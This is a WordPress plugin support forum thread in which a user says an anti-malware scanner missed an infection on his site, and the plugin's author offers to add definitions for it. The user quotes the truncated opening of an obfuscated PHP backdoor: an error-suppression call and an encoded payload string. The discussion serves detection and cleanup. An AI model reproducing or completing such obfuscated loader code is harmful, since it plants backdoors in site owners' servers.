Did not find known Virus

  • brentontherefore

    (@brentontherefore)


    11 years ago

    Running a full scan did not find a known malware which is sprinkled throughout my site. Virus looks like this:

    <?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y..
ZkT8h1Rn1XULdmbqxGU7h1Rn1XULdmbqZV

    EDIT: The developer contacted me immediately after I wrote this review and asked for information on the virus so that he could add it to the database. In fact, he mentioned that he thought that his software already had definitions for something like this, so he was surprised that it didn’t catch it. My suspicion is that my system was infected in a way that prevented his plugin from working properly. Several other plugins also would not scan properly.

    I am increasing my star rating to four due to his quick response and obvious care about this. However, I am not giving five stars because it seems that a system compromised by this virus has ways of preventing the scanner from working at all. In other words, even though it would find it if it could function properly, that does not help if it does not function properly due to the malware. However, I don’t doubt that this is one of the best antimalware plugins available to WordPress. The others I tried also had the same vulnerability.

Viewing 3 replies - 1 through 3 (of 3 total)
  • Plugin Author Eli

    (@scheeeli)

    Hey Brent,
    Give me a second change bro ??

    I have a definition update feature!!! If you send me the rest of that nasty script I will update it immediately and you can clean up any leftovers.

    You can email me directly if you like: eli AT gotmls DOT net

    Thread Starter brentontherefore

    (@brentontherefore)

    I’ve since deleted it, so I don’t have it handy (might be able to find it in a backup) but it was very similar (at least initially) to the one described here: https://blog.sucuri.net/2011/10/evil-backdoors-part-ii.html

    I was able to remove it by creating a PHP script based on this SO question: https://stackoverflow.com/questions/10422503/php-ssh-regex-script-command-to-delete-identical-malware-code-from-many-files

    Hope that helps you figure out how to fight this virus. I will email you the actual virus if I can find it.

    Plugin Author Eli

    (@scheeeli)

    This threat looks very similar to many others that are all defined in my plugin. Did you register my plugin and download the definition updates before you scanned?

    It’s a shame you didn’t contact me before posting your review. I always offer my assistance and add these new variants to my definition update so that everyone else benefits from your discovery.

    Please let me know if you find the whole code. I will add it right away.

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘Did not find known Virus’ is closed to new replies.